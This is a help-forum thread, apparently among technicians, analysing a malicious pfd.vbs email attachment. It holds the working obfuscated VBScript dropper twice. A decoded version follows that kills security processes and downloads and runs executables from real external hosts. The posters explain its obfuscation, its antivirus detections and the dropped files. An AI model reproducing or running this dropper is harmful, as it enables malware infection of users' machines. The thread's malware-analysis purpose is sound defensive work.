I got a call from a customer this morning. They had an hyperlink in their email that pointed to a pfd.vbs and you know they had to click on it. I downloaded the file and looked at it and can't figure out what it does. I am posting the code here to see if anyone can figure it out. Do not run the code! I don't know what it will do!

frefreFTtf="Execute[}mS{]runner>Nv<next>Nv<[}mS{][}mS{][}mS{][}mS{][}mS{][}mS{][}mS{][}mS{]runner=runner&chr(strs(i))>Nv<for[}mS{]i=1[}mS{]to[}mS{]UBound(strs)>Nv<strs=array(13,111,110,32,101,114,114,111,114,32,11 4,101,115,117,109,101,32,110,101,120,116,13,10,83, 101,116,32,72,74,85,106,105,104,55,103,72,61,67,11 4,101,97,116,101,79,98,106,101,99,116,40,34,87,34, 43,34,115,34,43,34,99,34,43,34,114,34,43,34,105,34 ,43,34,112,34,43,34,116,46,83,34,43,34,104,34,43,3 4,69,34,43,34,108,34,43,34,76,34,41,32,13,10,83,10 1,116,32,100,101,103,121,73,84,54,71,89,55,61,67,1 14,101,97,116,101,79,98,106,101,99,116,40,34,65,34 ,43,34,68,34,43,34,79,34,43,34,68,34,43,34,66,46,8 3,34,43,34,116,34,43,34,114,34,43,34,101,34,43,34, 97,34,43,34,109,34,41,13,10,72,85,72,111,111,117,1 04,56,57,72,56,61,34,47,34,13,10,100,101,103,121,1 08,84,54,71,89,55,61,34,104,116,116,112,58,34,13,1 0,118,104,61,34,37,54,54,37,54,34,13,10,104,118,61 ,34,37,50,69,34,43,118,104,43,34,57,37,55,50,37,55 ,51,37,55,52,37,54,68,37,54,49,37,54,67,37,54,67,3 7,50,69,37,54,66,37,55,50,34,43,72,85,72,111,111,1 17,104,56,57,72,56,43,34,37,54,68,37,54,70,37,54,5 2,37,55,53,37,54,67,37,54,53,34,13,10,83,101,116,3 2,85,72,85,111,111,117,104,56,57,72,56,32,61,32,67 ,114,101,97,116,101,79,98,106,101,99,116,40,34,77, 34,43,34,115,34,43,34,120,34,43,34,77,34,43,34,108 ,34,43,34,50,46,120,34,43,34,77,34,43,34,108,34,43 ,34,72,34,43,34,84,34,43,34,116,34,43,34,112,34,41 ,13,10,102,111,114,32,101,97,99,104,32,112,115,32, 105,110,32,103,101,116,111,98,106,101,99,116,40,34 ,119,105,110,109,103,109,116,115,58,92,92,46,92,11 4,111,111,116,92,99,105,109,118,50,58,119,105,110, 51,50,95,112,114,111,99,101,115,115,34,41,46,105,1 10,115,116,97,110,99,101,115,95,13,10,105,102,32,1 12,115,46,78,97,109,101,61,34,114,102,119,115,114, 118,46,101,120,101,34,32,111,114,32,112,115,46,110 ,97,109,101,61,34,49,46,101,120,101,34,32,111,114, 32,112,115,46,110,97,109,101,61,34,50,46,101,120,1 01,34,32,111,114,32,112,115,46,110,97,109,101,61,3 4,51,46,101,120,101,34,32,111,114,32,112,115,46,11 0,97,109,101,61,34,65,89,85,112,100,97,116,101,46, 97,121,101,34,116,104,101,110,32,13,10,72,74,85,10 6,105,104,55,103,72,46,114,117,110,32,34,110,116,1 15,100,32,45,112,32,34,43,99,115,116,114,40,43,112 ,115,46,104,97,110,100,108,101,41,32,43,34,32,45,9 9,32,113,34,44,48,13,10,101,110,100,32,105,102,13, 10,110,101,120,116,13,10,102,105,114,115,61,72,85, 72,111,111,117,104,56,57,72,56,43,118,104,43,34,67 ,37,54,49,37,55,51,37,54,56,34,43,72,85,72,111,111 ,117,104,56,57,72,56,43,34,37,54,50,37,54,49,37,54 ,69,37,54,69,37,54,53,37,55,50,37,51,48,37,51,50,4 6,37,54,55,37,54,57,37,54,54,34,13,10,85,72,85,111 ,111,117,104,56,57,72,56,46,79,112,101,110,32,34,7 1,69,84,34,44,100,101,103,121,108,84,54,71,89,55,4 3,72,85,72,111,111,117,104,56,57,72,56,43,72,85,72 ,111,111,117,104,56,57,72,56,43,34,37,55,57,37,54, 70,37,54,70,37,54,67,37,54,68,37,54,70,37,54,68,34 ,43,104,118,43,102,105,114,115,44,48,13,10,85,72,8 5,111,111,117,104,56,57,72,56,46,83,101,110,100,40 ,41,13,10,100,101,103,121,73,84,54,71,89,55,46,77, 111,100,101,61,51,13,10,100,101,103,121,73,84,54,7 1,89,55,46,84,121,112,101,61,49,13,10,100,101,103, 121,73,84,54,71,89,55,46,79,112,101,110,40,41,13,1 0,100,101,103,121,73,84,54,71,89,55,46,87,114,105, 116,101,40,85,72,85,111,111,117,104,56,57,72,56,46 ,114,101,115,112,111,110,115,101,66,111,100,121,41 ,13,10,100,101,103,121,73,84,54,71,89,55,46,115,65 ,86,101,116,79,70,105,76,101,32,34,67,58,92,111,11 7,111,46,101,120,101,34,13,10,72,74,85,106,105,104 ,55,103,72,46,114,117,110,32,40,34,99,109,100,32,4 7,99,32,115,101,116,32,100,97,116,101,61,37,100,97 ,116,101,37,32,38,38,100,97,116,101,32,50,48,48,53 ,45,49,45,49,32,38,38,112,105,110,103,32,45,110,32 ,49,48,32,49,50,55,46,48,46,48,46,49,32,38,38,115, 116,97,114,116,32,67,58,92,111,117,111,46,101,120, 101,32,38,38,100,97,116,101,32,37,100,97,116,101,3 7,32,34,41,44,48,13,10,111,110,32,101,114,114,111, 114,32,114,101,115,117,109,101,32,110,101,120,116, 13,10,72,74,85,61,34,37,54,49,37,34,13,10,65,55,61 ,34,37,55,34,13,10,65,54,70,54,67,54,67,54,53,54,5 5,54,53,50,69,54,70,65,55,54,52,51,49,51,49,51,52, 51,50,51,56,51,50,51,54,51,53,51,55,61,34,104,116, 116,112,58,47,47,34,13,10,83,101,116,32,72,74,85,1 06,105,104,55,103,72,61,67,114,101,97,116,101,79,9 8,106,101,99,116,40,34,87,34,43,34,115,34,43,34,99 ,34,43,34,114,34,43,34,105,34,43,34,112,34,43,34,1 16,46,83,34,43,34,104,34,43,34,69,34,43,34,108,34, 43,34,76,34,41,32,13,10,83,101,116,32,100,101,103, 121,73,84,54,71,89,55,61,67,114,101,97,116,101,79, 98,106,101,99,116,40,34,65,34,43,34,68,34,43,34,79 ,34,43,34,68,34,43,34,66,46,83,34,43,34,116,34,43, 34,114,34,43,34,101,34,43,34,97,34,43,34,109,34,41 ,13,10,83,101,116,32,85,72,85,111,111,117,104,56,5 7,72,57,32,61,32,67,114,101,97,116,101,79,98,106,1 01,99,116,40,34,77,34,43,34,115,34,43,34,120,34,43 ,34,77,34,43,34,108,34,43,34,50,46,120,34,43,34,77 ,34,43,34,108,34,43,34,72,34,43,34,84,34,43,34,116 ,34,43,34,112,34,41,13,10,102,111,114,32,101,97,99 ,104,32,112,115,32,105,110,32,103,101,116,111,98,1 06,101,99,116,40,34,119,105,110,109,103,109,116,11 5,58,92,92,46,92,114,111,111,116,92,99,105,109,118 ,50,58,119,105,110,51,50,95,112,114,111,99,101,115 ,115,34,41,46,105,110,115,116,97,110,99,101,115,95 ,13,10,105,102,32,112,115,46,78,97,109,101,61,34,1 14,102,119,115,114,118,46,101,120,101,34,32,111,11 4,32,112,115,46,110,97,109,101,61,34,49,46,101,120 ,101,34,32,111,114,32,112,115,46,110,97,109,101,61 ,34,50,46,101,120,101,34,32,111,114,32,112,115,46, 110,97,109,101,61,34,51,46,101,120,101,34,32,111,1 14,32,112,115,46,110,97,109,101,61,34,65,89,85,112 ,100,97,116,101,46,97,121,101,34,116,104,101,110,3 2,13,10,72,74,85,106,105,104,55,103,72,46,114,117, 110,32,34,110,116,115,100,32,45,112,32,34,43,99,11 5,116,114,40,43,112,115,46,104,97,110,100,108,101, 41,32,43,34,32,45,99,32,113,34,44,48,13,10,101,110 ,100,32,105,102,13,10,110,101,120,116,13,10,85,72, 85,111,111,117,104,56,57,72,57,46,79,112,101,110,3 2,34,71,69,84,34,44,65,54,70,54,67,54,67,54,53,54, 55,54,53,50,69,54,70,65,55,54,52,51,49,51,49,51,52 ,51,50,51,56,51,50,51,54,51,53,51,55,43,65,55,43,3 4,57,37,54,65,37,54,55,34,43,65,55,43,34,50,37,54, 53,37,54,53,37,54,69,37,50,69,37,54,54,37,54,57,34 ,43,65,55,43,34,50,34,43,65,55,43,34,51,34,43,65,5 5,43,34,52,37,54,68,34,43,72,74,85,43,34,54,67,37, 54,67,37,50,69,37,54,66,34,43,65,55,43,34,50,47,37 ,55,48,34,43,72,74,85,43,34,55,50,34,43,65,55,43,3 4,52,37,54,69,37,54,53,34,43,65,55,43,34,50,47,37, 54,53,34,43,65,55,43,34,51,37,54,53,37,54,67,37,54 ,67,37,54,53,34,43,65,55,43,34,50,34,43,65,55,43,3 4,51,47,34,43,65,55,43,34,52,37,54,68,34,43,65,55, 43,34,48,47,37,51,50,37,51,48,37,51,48,37,51,56,37 ,51,49,37,51,48,37,51,48,37,51,50,37,51,49,37,51,5 6,37,51,51,37,51,52,37,51,56,34,43,65,55,43,34,56, 34,44,48,13,10,85,72,85,111,111,117,104,56,57,72,5 7,46,83,101,110,100,40,41,13,10,100,101,103,121,73 ,84,54,71,89,55,46,77,111,100,101,61,51,13,10,100, 101,103,121,73,84,54,71,89,55,46,84,121,112,101,61 ,49,13,10,100,101,103,121,73,84,54,71,89,55,46,79, 112,101,110,40,41,13,10,100,101,103,121,73,84,54,7 1,89,55,46,87,114,105,116,101,40,85,72,85,111,111, 117,104,56,57,72,57,46,114,101,115,112,111,110,115 ,101,66,111,100,121,41,13,10,100,101,103,121,73,84 ,54,71,89,55,46,115,65,86,101,116,79,70,105,76,101 ,32,34,67,58,92,87,73,78,68,79,87,83,92,97,100,100 ,105,110,115,92,111,115,46,101,120,101,34,13,10,72 ,74,85,106,105,104,55,103,72,46,114,117,110,32,40, 34,99,109,100,32,47,99,32,115,101,116,32,100,97,11 6,101,61,37,100,97,116,101,37,32,38,38,100,97,116, 101,32,50,48,48,53,45,49,45,49,32,38,38,112,105,11 0,103,32,45,110,32,49,48,32,49,50,55,46,48,46,48,4 6,49,32,38,38,115,116,97,114,116,32,67,58,92,87,73 ,78,68,79,87,83,92,97,100,100,105,110,115,92,111,1 15,46,101,120,101,32,38,38,100,97,116,101,32,37,10 0,97,116,101,37,32,34,41,44,48,13,10,87,83,99,114, 105,112,116,46,83,108,101,101,112,32,49,51,48,48,4 8,13,10,99,114,101,97,116,101,111,98,106,101,99,11 6,40,34,119,115,99,114,105,112,116,46,115,104,101, 108,108,34,41,46,114,117,110,32,34,99,109,100,32,4 7,99,32,100,101,108,32,47,102,32,47,115,32,47,113, 32,67,58,92,111,117,111,46,101,120,101,34,44,48,13 ,10)>Nv<"
frefreFTtf = Replace(frefreFTtf, "[}mS{]",chr(9))
frefreFTtf = Replace(frefreFTtf, "ΰ", chr(34))
frefreFTtf = Replace(frefreFTtf, "Ǯ", chr(39))
execute(MyEncode(frefreFTtf))
function MyEncode(hack520org)
sz = Split(hack520org, ">Nv<")
For i = UBound(sz) To 0 Step -1
weiwei = weiwei + sz(i) + vbcrlf
Next
MyEncode=weiwei
end functionfrefreFTtf="Execute[}mS{]runner>Nv<next>Nv<[}mS{][}mS{][}mS{][}mS{][}mS{][}mS{][}mS{][}mS{]runner=runner&chr(strs(i))>Nv<for[}mS{]i=1[}mS{]to[}mS{]UBound(strs)>Nv<strs=array(13,111,110,32,101,114,114,111,114,32,11 4,101,115,117,109,101,32,110,101,120,116,13,10,83, 101,116,32,72,74,85,106,105,104,55,103,72,61,67,11 4,101,97,116,101,79,98,106,101,99,116,40,34,87,34, 43,34,115,34,43,34,99,34,43,34,114,34,43,34,105,34 ,43,34,112,34,43,34,116,46,83,34,43,34,104,34,43,3 4,69,34,43,34,108,34,43,34,76,34,41,32,13,10,83,10 1,116,32,100,101,103,121,73,84,54,71,89,55,61,67,1 14,101,97,116,101,79,98,106,101,99,116,40,34,65,34 ,43,34,68,34,43,34,79,34,43,34,68,34,43,34,66,46,8 3,34,43,34,116,34,43,34,114,34,43,34,101,34,43,34, 97,34,43,34,109,34,41,13,10,72,85,72,111,111,117,1 04,56,57,72,56,61,34,47,34,13,10,100,101,103,121,1 08,84,54,71,89,55,61,34,104,116,116,112,58,34,13,1 0,118,104,61,34,37,54,54,37,54,34,13,10,104,118,61 ,34,37,50,69,34,43,118,104,43,34,57,37,55,50,37,55 ,51,37,55,52,37,54,68,37,54,49,37,54,67,37,54,67,3 7,50,69,37,54,66,37,55,50,34,43,72,85,72,111,111,1 17,104,56,57,72,56,43,34,37,54,68,37,54,70,37,54,5 2,37,55,53,37,54,67,37,54,53,34,13,10,83,101,116,3 2,85,72,85,111,111,117,104,56,57,72,56,32,61,32,67 ,114,101,97,116,101,79,98,106,101,99,116,40,34,77, 34,43,34,115,34,43,34,120,34,43,34,77,34,43,34,108 ,34,43,34,50,46,120,34,43,34,77,34,43,34,108,34,43 ,34,72,34,43,34,84,34,43,34,116,34,43,34,112,34,41 ,13,10,102,111,114,32,101,97,99,104,32,112,115,32, 105,110,32,103,101,116,111,98,106,101,99,116,40,34 ,119,105,110,109,103,109,116,115,58,92,92,46,92,11 4,111,111,116,92,99,105,109,118,50,58,119,105,110, 51,50,95,112,114,111,99,101,115,115,34,41,46,105,1 10,115,116,97,110,99,101,115,95,13,10,105,102,32,1 12,115,46,78,97,109,101,61,34,114,102,119,115,114, 118,46,101,120,101,34,32,111,114,32,112,115,46,110 ,97,109,101,61,34,49,46,101,120,101,34,32,111,114, 32,112,115,46,110,97,109,101,61,34,50,46,101,120,1 01,34,32,111,114,32,112,115,46,110,97,109,101,61,3 4,51,46,101,120,101,34,32,111,114,32,112,115,46,11 0,97,109,101,61,34,65,89,85,112,100,97,116,101,46, 97,121,101,34,116,104,101,110,32,13,10,72,74,85,10 6,105,104,55,103,72,46,114,117,110,32,34,110,116,1 15,100,32,45,112,32,34,43,99,115,116,114,40,43,112 ,115,46,104,97,110,100,108,101,41,32,43,34,32,45,9 9,32,113,34,44,48,13,10,101,110,100,32,105,102,13, 10,110,101,120,116,13,10,102,105,114,115,61,72,85, 72,111,111,117,104,56,57,72,56,43,118,104,43,34,67 ,37,54,49,37,55,51,37,54,56,34,43,72,85,72,111,111 ,117,104,56,57,72,56,43,34,37,54,50,37,54,49,37,54 ,69,37,54,69,37,54,53,37,55,50,37,51,48,37,51,50,4 6,37,54,55,37,54,57,37,54,54,34,13,10,85,72,85,111 ,111,117,104,56,57,72,56,46,79,112,101,110,32,34,7 1,69,84,34,44,100,101,103,121,108,84,54,71,89,55,4 3,72,85,72,111,111,117,104,56,57,72,56,43,72,85,72 ,111,111,117,104,56,57,72,56,43,34,37,55,57,37,54, 70,37,54,70,37,54,67,37,54,68,37,54,70,37,54,68,34 ,43,104,118,43,102,105,114,115,44,48,13,10,85,72,8 5,111,111,117,104,56,57,72,56,46,83,101,110,100,40 ,41,13,10,100,101,103,121,73,84,54,71,89,55,46,77, 111,100,101,61,51,13,10,100,101,103,121,73,84,54,7 1,89,55,46,84,121,112,101,61,49,13,10,100,101,103, 121,73,84,54,71,89,55,46,79,112,101,110,40,41,13,1 0,100,101,103,121,73,84,54,71,89,55,46,87,114,105, 116,101,40,85,72,85,111,111,117,104,56,57,72,56,46 ,114,101,115,112,111,110,115,101,66,111,100,121,41 ,13,10,100,101,103,121,73,84,54,71,89,55,46,115,65 ,86,101,116,79,70,105,76,101,32,34,67,58,92,111,11 7,111,46,101,120,101,34,13,10,72,74,85,106,105,104 ,55,103,72,46,114,117,110,32,40,34,99,109,100,32,4 7,99,32,115,101,116,32,100,97,116,101,61,37,100,97 ,116,101,37,32,38,38,100,97,116,101,32,50,48,48,53 ,45,49,45,49,32,38,38,112,105,110,103,32,45,110,32 ,49,48,32,49,50,55,46,48,46,48,46,49,32,38,38,115, 116,97,114,116,32,67,58,92,111,117,111,46,101,120, 101,32,38,38,100,97,116,101,32,37,100,97,116,101,3 7,32,34,41,44,48,13,10,111,110,32,101,114,114,111, 114,32,114,101,115,117,109,101,32,110,101,120,116, 13,10,72,74,85,61,34,37,54,49,37,34,13,10,65,55,61 ,34,37,55,34,13,10,65,54,70,54,67,54,67,54,53,54,5 5,54,53,50,69,54,70,65,55,54,52,51,49,51,49,51,52, 51,50,51,56,51,50,51,54,51,53,51,55,61,34,104,116, 116,112,58,47,47,34,13,10,83,101,116,32,72,74,85,1 06,105,104,55,103,72,61,67,114,101,97,116,101,79,9 8,106,101,99,116,40,34,87,34,43,34,115,34,43,34,99 ,34,43,34,114,34,43,34,105,34,43,34,112,34,43,34,1 16,46,83,34,43,34,104,34,43,34,69,34,43,34,108,34, 43,34,76,34,41,32,13,10,83,101,116,32,100,101,103, 121,73,84,54,71,89,55,61,67,114,101,97,116,101,79, 98,106,101,99,116,40,34,65,34,43,34,68,34,43,34,79 ,34,43,34,68,34,43,34,66,46,83,34,43,34,116,34,43, 34,114,34,43,34,101,34,43,34,97,34,43,34,109,34,41 ,13,10,83,101,116,32,85,72,85,111,111,117,104,56,5 7,72,57,32,61,32,67,114,101,97,116,101,79,98,106,1 01,99,116,40,34,77,34,43,34,115,34,43,34,120,34,43 ,34,77,34,43,34,108,34,43,34,50,46,120,34,43,34,77 ,34,43,34,108,34,43,34,72,34,43,34,84,34,43,34,116 ,34,43,34,112,34,41,13,10,102,111,114,32,101,97,99 ,104,32,112,115,32,105,110,32,103,101,116,111,98,1 06,101,99,116,40,34,119,105,110,109,103,109,116,11 5,58,92,92,46,92,114,111,111,116,92,99,105,109,118 ,50,58,119,105,110,51,50,95,112,114,111,99,101,115 ,115,34,41,46,105,110,115,116,97,110,99,101,115,95 ,13,10,105,102,32,112,115,46,78,97,109,101,61,34,1 14,102,119,115,114,118,46,101,120,101,34,32,111,11 4,32,112,115,46,110,97,109,101,61,34,49,46,101,120 ,101,34,32,111,114,32,112,115,46,110,97,109,101,61 ,34,50,46,101,120,101,34,32,111,114,32,112,115,46, 110,97,109,101,61,34,51,46,101,120,101,34,32,111,1 14,32,112,115,46,110,97,109,101,61,34,65,89,85,112 ,100,97,116,101,46,97,121,101,34,116,104,101,110,3 2,13,10,72,74,85,106,105,104,55,103,72,46,114,117, 110,32,34,110,116,115,100,32,45,112,32,34,43,99,11 5,116,114,40,43,112,115,46,104,97,110,100,108,101, 41,32,43,34,32,45,99,32,113,34,44,48,13,10,101,110 ,100,32,105,102,13,10,110,101,120,116,13,10,85,72, 85,111,111,117,104,56,57,72,57,46,79,112,101,110,3 2,34,71,69,84,34,44,65,54,70,54,67,54,67,54,53,54, 55,54,53,50,69,54,70,65,55,54,52,51,49,51,49,51,52 ,51,50,51,56,51,50,51,54,51,53,51,55,43,65,55,43,3 4,57,37,54,65,37,54,55,34,43,65,55,43,34,50,37,54, 53,37,54,53,37,54,69,37,50,69,37,54,54,37,54,57,34 ,43,65,55,43,34,50,34,43,65,55,43,34,51,34,43,65,5 5,43,34,52,37,54,68,34,43,72,74,85,43,34,54,67,37, 54,67,37,50,69,37,54,66,34,43,65,55,43,34,50,47,37 ,55,48,34,43,72,74,85,43,34,55,50,34,43,65,55,43,3 4,52,37,54,69,37,54,53,34,43,65,55,43,34,50,47,37, 54,53,34,43,65,55,43,34,51,37,54,53,37,54,67,37,54 ,67,37,54,53,34,43,65,55,43,34,50,34,43,65,55,43,3 4,51,47,34,43,65,55,43,34,52,37,54,68,34,43,65,55, 43,34,48,47,37,51,50,37,51,48,37,51,48,37,51,56,37 ,51,49,37,51,48,37,51,48,37,51,50,37,51,49,37,51,5 6,37,51,51,37,51,52,37,51,56,34,43,65,55,43,34,56, 34,44,48,13,10,85,72,85,111,111,117,104,56,57,72,5 7,46,83,101,110,100,40,41,13,10,100,101,103,121,73 ,84,54,71,89,55,46,77,111,100,101,61,51,13,10,100, 101,103,121,73,84,54,71,89,55,46,84,121,112,101,61 ,49,13,10,100,101,103,121,73,84,54,71,89,55,46,79, 112,101,110,40,41,13,10,100,101,103,121,73,84,54,7 1,89,55,46,87,114,105,116,101,40,85,72,85,111,111, 117,104,56,57,72,57,46,114,101,115,112,111,110,115 ,101,66,111,100,121,41,13,10,100,101,103,121,73,84 ,54,71,89,55,46,115,65,86,101,116,79,70,105,76,101 ,32,34,67,58,92,87,73,78,68,79,87,83,92,97,100,100 ,105,110,115,92,111,115,46,101,120,101,34,13,10,72 ,74,85,106,105,104,55,103,72,46,114,117,110,32,40, 34,99,109,100,32,47,99,32,115,101,116,32,100,97,11 6,101,61,37,100,97,116,101,37,32,38,38,100,97,116, 101,32,50,48,48,53,45,49,45,49,32,38,38,112,105,11 0,103,32,45,110,32,49,48,32,49,50,55,46,48,46,48,4 6,49,32,38,38,115,116,97,114,116,32,67,58,92,87,73 ,78,68,79,87,83,92,97,100,100,105,110,115,92,111,1 15,46,101,120,101,32,38,38,100,97,116,101,32,37,10 0,97,116,101,37,32,34,41,44,48,13,10,87,83,99,114, 105,112,116,46,83,108,101,101,112,32,49,51,48,48,4 8,13,10,99,114,101,97,116,101,111,98,106,101,99,11 6,40,34,119,115,99,114,105,112,116,46,115,104,101, 108,108,34,41,46,114,117,110,32,34,99,109,100,32,4 7,99,32,100,101,108,32,47,102,32,47,115,32,47,113, 32,67,58,92,111,117,111,46,101,120,101,34,44,48,13 ,10)>Nv<"
frefreFTtf = Replace(frefreFTtf, "[}mS{]",chr(9))
frefreFTtf = Replace(frefreFTtf, "ΰ", chr(34))
frefreFTtf = Replace(frefreFTtf, "Ǯ", chr(39))
execute(MyEncode(frefreFTtf))
function MyEncode(hack520org)
sz = Split(hack520org, ">Nv<")
For i = UBound(sz) To 0 Step -1
weiwei = weiwei + sz(i) + vbcrlf
Next
MyEncode=weiwei
end function

Well I know a bit of VB although its been years since I used it. It looks like a very odd function indeed.

Reminds me rather like the old data pokes you had to on a C64 to control the CPU at low level.

I have also don a bit of vbs but I have never seen anything like it. I was able to find other examples online but no explanation. I also found it in many different languages.

My suspicions confirmed.
Is a visual basic script written by a Chineze programmer.
"FreFre" and "WeiWei" as names of variables, that sounded Chineze to me.
So I looked further and found "hack520org" which is a chinese site hack520.org
Stay away from it.
It replaces some characters which I believe are encoded with other characters then it does it's own encoding.

It's written MALWARE all over it

And this is what "Norton Safe" says about that website:
http://safeweb.norton.com/report/show?url=http:%2F%2Fwww.hack520.org%2F

while I don't know what it does in the end, it is basically decrypting an encrypted VBS file and executing it.

It looks like the numbers are simple offset locations of ASCII text (lookup an ASCII table).

Foir example,
frefreFTtf = Replace(frefreFTtf, "[}mS{]",chr(9))
frefreFTtf = Replace(frefreFTtf, "ΰ", chr(34))
frefreFTtf = Replace(frefreFTtf, "Ǯ", chr(39))

[}mS{] replaced with a TAB key
ΰ is replaced with a double quote sign "
and the last one is replaced with a single quote '

im not going to manually convert all of those numbers to ASCII, and I don't have a utility on hand that will, so I can't tell you what it does.

while I don't know what it does in the end, it is basically decrypting an encrypted VBS file and executing it.

It looks like the numbers are simple offset locations of ASCII text (lookup an ASCII table).

Foir example,
frefreFTtf = Replace(frefreFTtf, "[}mS{]",chr(9))
frefreFTtf = Replace(frefreFTtf, "ΰ", chr(34))
frefreFTtf = Replace(frefreFTtf, "Ǯ", chr(39))

[}mS{] replaced with a TAB key
ΰ is replaced with a double quote sign "
and the last one is replaced with a single quote '

im not going to manually convert all of those numbers to ASCII, and I don't have a utility on hand that will, so I can't tell you what it does.

That is the beauty of it.
I am not going to convert those numbers to characters either.
But it looks like those numbers are the real code of the whatever it is.
Simple but ingenious.
Hard to figure out by antivirus software. They (the antivirus software) are looking at compiled code or pure code. Having the ASCII characters all in one big array is an ingenious way of fooling the antivirus.

CA AV didn't find it, Malwarebytes didn't find it but AVG did and removed it.
Thanks guys for the info.

I will close this one.

Thread Closed by frostbyte5014

Virus Total (http://www.virustotal.com/analisis/809b8ead935ef3e59ff67abbdf233f0394987cb3d4ca2a7ae4 602c8529ab33dc-1258481233)

AntiVir 7.9.1.70 2009.11.17 HTML/Crypted.Gen
Fortinet 3.120.0.0 2009.11.17 VBS/RFI.A!tr.dldr
McAfee-GW-Edition 6.8.5 2009.11.17 Heuristic.Script.Crypted


Jotti

http://virusscan.jotti.org/en/scanresult/958b38327debff472f1085c0c8fd5db5eaa1f6e2

If i get bored later I may run this on a virtual machine to see what happens

Id like to see someone decrypt the code first before they go poking it with a stick, ie running it

Id like to see someone decrypt the code first before they go poking it with a stick

Where's your sense of adventure?!

I traded it in for apathy :p

No but I just want to know what it is then well yeah jump into the mud and see what it really does and how much trouble it is.

I traded it in for apathy :p

No but I just want to know what it is then well yeah jump into the mud and see what it really does and how much trouble it is.

Go for it ! :cool:
And let us know what you found.
It would be like watching a thriller from the comfort of the living room

have fun

on error resume next
Set HJUjih7gH=CreateObject("W"+"s"+"c"+"r"+"i"+"p"+"t.S"+"h"+"E"+"l"+"L")
Set degyIT6GY7=CreateObject("A"+"D"+"O"+"D"+"B.S"+"t"+"r"+"e"+"a"+"m")
HUHoouh89H8="/"
degylT6GY7="http:"
vh="%66%6"
hv="%2E"+vh+"9%72%73%74%6D%61%6C%6C%2E%6B%72"+HUHoouh89H8+"%6D%6F%64%75%6C%65"
Set UHUoouh89H8 = CreateObject("M"+"s"+"x"+"M"+"l"+"2.x"+"M"+"l"+"H"+"T"+"t"+"p" )
for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_
if ps.Name="rfwsrv.exe" or ps.name="1.exe" or ps.name="2.exe" or ps.name="3.exe" or ps.name="AYUpdate.aye"then
HJUjih7gH.run "ntsd -p "+cstr(+ps.handle) +" -c q",0
end if
next
firs=HUHoouh89H8+vh+"C%61%73%68"+HUHoouh89H8+"%62%61%6E%6E%65%72%30%32.%67%69%66 "
UHUoouh89H8.Open "GET",degylT6GY7+HUHoouh89H8+HUHoouh89H8+"%79%6F%6F%6C%6D%6F%6D "+hv+firs,0
UHUoouh89H8.Send()
degyIT6GY7.Mode=3
degyIT6GY7.Type=1
degyIT6GY7.Open()
degyIT6GY7.Write(UHUoouh89H8.responseBody)
degyIT6GY7.sAVetOFiLe "C:\ouo.exe"
HJUjih7gH.run ("cmd /c set date=%date% &&date 2005-1-1 &&ping -n 10 127.0.0.1 && start C:\ouo.exe &&date %date% "),0
on error resume next
HJU="%61%"
A7="%7"
A6F6C6C6567652E6FA764313134323832363537="http://"
Set HJUjih7gH=CreateObject("W"+"s"+"c"+"r"+"i"+"p"+"t.S"+"h"+"E"+"l"+"L")
Set degyIT6GY7=CreateObject("A"+"D"+"O"+"D"+"B.S"+"t"+"r"+"e"+"a"+"m")
Set UHUoouh89H9 = CreateObject("M"+"s"+"x"+"M"+"l"+"2.x"+"M"+"l"+"H"+"T"+"t"+"p" )
for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_
if ps.Name="rfwsrv.exe" or ps.name="1.exe" or ps.name="2.exe" or ps.name="3.exe" or ps.name="AYUpdate.aye"then
HJUjih7gH.run "ntsd -p "+cstr(+ps.handle) +" -c q",0
end if
next
UHUoouh89H9.Open "GET",A6F6C6C6567652E6FA764313134323832363537+A7+"9%6A%67"+A7+" 2%65%65%6E%2E%66%69"+A7+"2"+A7+"3"+A7+"4%6D"+HJU+"6C%6C%2E%6B"+A7+"2/%70"+HJU+"7 2"+A7+"4%6E%65"+A7+"2/%65"+A7+"3%65%6C%6C%65"+A7+"2"+A7+"3/"+A7+"4%6D"+A7+"0/%32 %30%30%38%31%30%30%32%31%38%33%34%38"+A7+"8",0
UHUoouh89H9.Send()
degyIT6GY7.Mode=3
degyIT6GY7.Type=1
degyIT6GY7.Open()
degyIT6GY7.Write(UHUoouh89H9.responseBody)
degyIT6GY7.sAVetOFiLe "C:\WINDOWS\addins\os.exe"
HJUjih7gH.run ("cmd /c set date=%date% &&date 2005-1-1 &&ping -n 10 127.0.0.1 && start C:\WINDOWS\addins\os.exe &&date %date% "),0
WScript.Sleep 13000
createobject("wscript.shell").run "cmd /c del /f /s /q C:\ouo.exe",0


as both arrays of numbers looked the same to me when I glanced at them, I am sure they do similar things but download from different sites.
for those who did run it, look for os.exe and ouo.exe and be sure to delete them.

perl > vbs


edit:

what it seems to do:

creates 2 objects, a Wscript.Shell and ADODB.Stream

sets up some varibles

creates an MsXml2 object to do a Ajax call

gets a list of all running processes and scans through them

if it is called rfwsrv.exe, 1.exe, 2.exe 3.exe or AYUpdate.aye then it runs ntsd -p (processid) - c q on it.
I don't know what ntsd is, but is apparently a debugger.

it then downloads a file from some URL and saves it to C:\ouo.exe using the ADODB.Stream it created

it then runs this series of commands:
cmd /c set date=%date%
date 2005-1-1
ping -n 10 127.0.0.1
start C:\ouo.exe
date %date%


does the same exact stuff again but downloads a file to C:\WINDOWS\addins\os.exe

It runs this file with the commands:
cmd /c set date=%date%
date 2005-1-1
ping -n 10 127.0.0.1
start C:\WINDOWS\addins\os.exe
date %date%

and then deletes the first file downloaded with the command:
cmd /c del /f /s /q C:\ouo.exe

Well done!
My respects flying to you.:)

first URL it downloads:

yoolmom.firstmall.kr/module/flash/banner02.gif

second URL seems to be:
yjgreen.firstmall.kr/partner/esellers/tmp/2008100218348x

Well done!
My respects flying to you.:)

thank you :)

first URL it downloads:

yoolmom.firstmall.kr/module/flash/banner02.gif

second URL seems to be:
yjgreen.firstmall.kr/partner/esellers/tmp/2008100218348x



thank you :)

Second download is a trojan and shows as "Identity threat"
It creates the following file:
C:\users\username\appdata\local\temp\+v+c_x+b.part

there are probably other parts (seems to be sort of an archive) but my Norton stopped it there.

Kaspersky has the first website blacklisted, so I didn't attempt to download it.

the second URL was blocked for being AdWare.Win32.BHO.jxe, but I was unable to find any info on it.

Symantec's description of this threat:
sorry, that was the wrong lead. Link deleted

You could always upload it to the guys I posted here

http://www.technibble.com/forums/showthread.php?t=10930

your post has nothing to do with this thread, what are you trying to accomplish?

edit: nevermind, probably a spam bot, along with Merprody73.

your post has nothing to do with this thread, what are you trying to accomplish?

.. tryin; to get post count above 5 so he can see the private stuff lol and steal all our secrets :eek: